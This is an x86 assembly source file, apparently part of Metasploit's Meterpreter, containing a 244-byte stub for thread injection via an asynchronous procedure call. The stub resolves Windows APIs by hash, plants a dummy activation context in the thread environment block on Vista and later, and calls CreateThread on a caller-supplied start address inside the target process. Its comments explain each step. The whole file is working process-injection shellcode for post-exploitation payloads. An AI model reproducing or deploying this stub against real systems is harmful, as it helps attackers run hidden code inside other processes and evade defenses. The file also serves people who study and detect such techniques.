;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Architecture: x86 (but not wow64)
; Version: 2.0 (March 2010)
; Size: 244 bytes
; Build: >build.py apc
;-----------------------------------------------------------------------------;

; A small stub to be used for thread injection where we gain execution via an injected APC. See the
; file "\msf3\external\source\meterpreter\source\common\arch\win\i386\base_inject.c" for more details
;
; What the stub does, in order (offsets refer to the APCCONTEXT layout below):
;   1. Reads its APCCONTEXT pointer from the first stack argument of the APC routine.
;   2. Uses ctx->bExecuted (offset 16) as a once-only flag: it is tested and then set
;      before anything else happens, so only the first run with a given context
;      reaches CreateThread; any later run just returns.
;   3. If GetVersion() reports a major version >= 6 and the TEB has no
;      ActivationContextStackPointer yet, points it at the zeroed dummy structure
;      at label 'context' (the 0x18 zero bytes at the end of this file).
;   4. Calls CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL )
;      and returns with retn 12, popping the three DWORD arguments of the APC routine.
;
; Register roles:
;   ESI = pointer to the APCCONTEXT (live for the whole stub)
;   EBX = runtime address of 'delta' == 'api_call' from block_api.asm (live across every call)
;   EAX = GetVersion() result, then the TEB pointer; ECX/EDX = scratch
;
; Layout of the structure ESI points to. The unions keep each pointer in an 8 byte
; slot so the offsets used below ([esi], [esi+8], [esi+16]) are fixed.
;typedef struct _APCCONTEXT
;{
; union
; {
; LPVOID lpStartAddress; // offset 0  -> read as [esi]
; BYTE bPadding1[8];
; } s;
; union
; {
; LPVOID lpParameter; // offset 8  -> read as [esi+8]
; BYTE bPadding2[8];
; } p;
; BYTE bExecuted; // offset 16 -> tested/set as byte [esi+16]
;} APCCONTEXT, * LPAPCCONTEXT;

[BITS 32]
[ORG 0]

cld ; Clear the direction flag.
mov esi, [esp+4] ; ESI is a pointer to our apc stub context (first argument of the APC routine)
push ebp ; Prologue, save EBP...
mov ebp, esp ; And create a new stack frame
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ; The return address pushed by 'call start' is the address of this label; ORG is 0, so every label offset is taken relative to delta via EBX.
%include "./src/block/block_api.asm" ; Provides 'api_call', invoked through EBX with a 32-bit hash of "dll!export" pushed last.
start: ;
pop ebx ; Pop off the address of 'api_call' for calling later.
cmp byte [esi+16], 0 ; Has this context already been executed (ctx->bExecuted)?
jne cleanup ; If so just leave this APC without creating a second thread
mov byte [esi+16], 1 ; Otherwise mark the context as executed and proceed. The flag is set before any call so a re-run bails out at the check above.
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
call ebx ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7 (major version < 6; jl is a signed compare, fine for these small values)
jl short continue ; then continue to CreateThread... otherwise we must create a dummy thread ActivationContext
xor ecx, ecx ; zero ECX
mov eax, [fs:ecx+24] ; Get the current TEB (ECX is zero, so this reads fs:[0x18], the TEB self-pointer)
cmp dword [eax+424], ecx ; Is the TEB ActivationContextStackPointer pointer (TEB offset 0x1A8) NULL?
jne continue ; If there already is an ActivationContext structure setup, just continue
lea edx, [ebx+context-delta] ; calculate the address of our dummy ActivationContext (EBX holds the runtime address of delta)
mov dword [eax+424], edx ; and set the address of our dummy ActivationContext in the current TEB
continue:
xor ecx, ecx ; Clear ECX; pushed below for every NULL / 0 argument
push ecx ; lpThreadId = NULL
push ecx ; dwCreationFlags = 0
push dword [esi+8] ; ctx->lpParameter
push dword [esi] ; ctx->lpStartAddress
push ecx ; dwStackSize = 0
push ecx ; lpThreadAttributes = NULL
push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
call ebx ; CreateThread( NULL, 0, ctx->lpStartAddress, ctx->lpParameter, 0, NULL ); the handle returned in EAX is neither checked nor closed.
cleanup:
leave ; epilogue
retn 12 ; Return (cleaning up stack params) and finish our APC routine. 12 bytes = the three DWORD arguments of the APC routine.
context:
TIMES 0x18 db 0 ; An empty ntdll!_ACTIVATION_CONTEXT_STACK structure; its runtime address is stored into the TEB above.